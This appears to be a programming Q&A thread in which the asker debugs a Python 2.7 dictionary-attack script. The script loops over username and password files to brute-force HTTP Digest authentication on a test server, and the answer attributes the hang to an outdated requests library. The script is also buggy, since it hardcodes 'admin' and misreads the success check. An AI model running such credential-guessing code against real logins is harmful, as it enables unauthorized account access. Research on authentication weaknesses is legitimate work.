# python using HTTPDigestAuth in a loop

Tags: python-2.7, digest-authentication

Im doing some research on HTTPDigest Auth, and im trying to create a dictonary attack script to prove that its doable. My task is to provide 2 files where the 1 file contains all the user names, and the other all the passwords, that i should try and login with.

So i included requests libary and im using that to send username and password to a testserver that are already set-up to recieve my credentials.

I tried this with just sending 1 line of code, without the loop, with the correct password and username, and i do get access, it works.

However when i put the requests() function inside the loop, it breaks.

> Resourse: https://github.com/kennethreitz/requests/issues/541
>
> Regarding that resourse:
>
> From what i understand it has something to do with the wrong password.
>   I read that if one feeds it with a wrong password it hangs in a
>   infinite loop

So first here is my code.

```
import requests
import sys

from requests.auth import HTTPDigestAuth

with open("user.txt") as u:
        users = u.readlines()

with open("digest.txt") as p:
        passwords = p.readlines()

for uname in users:
        username = uname
        for upass in passwords:
                password = upass
                url = '...the test server url...'
                r=requests.get(url,auth=HTTPDigestAuth('admin',password))
                if r.text.find("Well done!"):
                        print "Access granted sir %s:%s"% (username, password)
                        sys.exit()
```

When i ran this code it just hangs there, nothing happens on the screen. I tried filling the password file with only 2 passwords in where the second was the correct one.  Still the same behavior.

So i had to press ctrl+c in order to break out of the code.

This is what i see.

```
^CTraceback (most recent call last):
  File "./digest_get_attack.py", line 36, in <module>
    r=requests.get(url,auth=HTTPDigestAuth('admin',password))
  File "/usr/lib/python2.7/dist-packages/requests/api.py", line 52, in get
    return request('get', url, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/api.py", line 40, in request
    return s.request(method=method, url=url, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 229, in request
    r.send(prefetch=prefetch)
  File "/usr/lib/python2.7/dist-packages/requests/models.py", line 633, in send
    self.response = dispatch_hook('response', self.hooks, self.response)
  File "/usr/lib/python2.7/dist-packages/requests/hooks.py", line 47, in dispatch_hook
    hook_data = hook(hook_data) or hook_data
  File "/usr/lib/python2.7/dist-packages/requests/auth.py", line 181, in handle_401
    r.request.send(anyway=True)
  File "/usr/lib/python2.7/dist-packages/requests/models.py", line 633, in send
    self.response = dispatch_hook('response', self.hooks, self.response)
  File "/usr/lib/python2.7/dist-packages/requests/hooks.py", line 47, in dispatch_hook
    hook_data = hook(hook_data) or hook_data
  File "/usr/lib/python2.7/dist-packages/requests/auth.py", line 181, in handle_401
    r.request.send(anyway=True)
  File "/usr/lib/python2.7/dist-packages/requests/models.py", line 600, in send
    timeout=self.timeout,
  File "/usr/lib/python2.7/dist-packages/requests/packages/urllib3/connectionpool.py", line 384, in urlopen
    body=body, headers=headers)
  File "/usr/lib/python2.7/dist-packages/requests/packages/urllib3/connectionpool.py", line 261, in _make_request
    httplib_response = conn.getresponse()
  File "/usr/lib/python2.7/httplib.py", line 1034, in getresponse
    response.begin()
  File "/usr/lib/python2.7/httplib.py", line 407, in begin
    version, status, reason = self._read_status()
  File "/usr/lib/python2.7/httplib.py", line 365, in _read_status
    line = self.fp.readline()
  File "/usr/lib/python2.7/socket.py", line 430, in readline
    data = recv(1)
KeyboardInterrupt
```

I am clueless to what is happening.  Im not sure what to say either.  This is the errors which i got, and really it just hangs there, waiting for something to happen.. Its like a loop-forever.

Any ideas? :)

Answer (score 0):

Ok guys.. After a lot of reading, a lot of testing, sometimes "something" great happens :)

I solved it.

So here is what i did.  Im using the installed version Python 2.7.3 from Linux Kali.  For some reason the "requests" lib was not 100% up-to-date.  So i used PIP to uninstall Requests, and i then reinstalled it.  Resulting in that my code works now.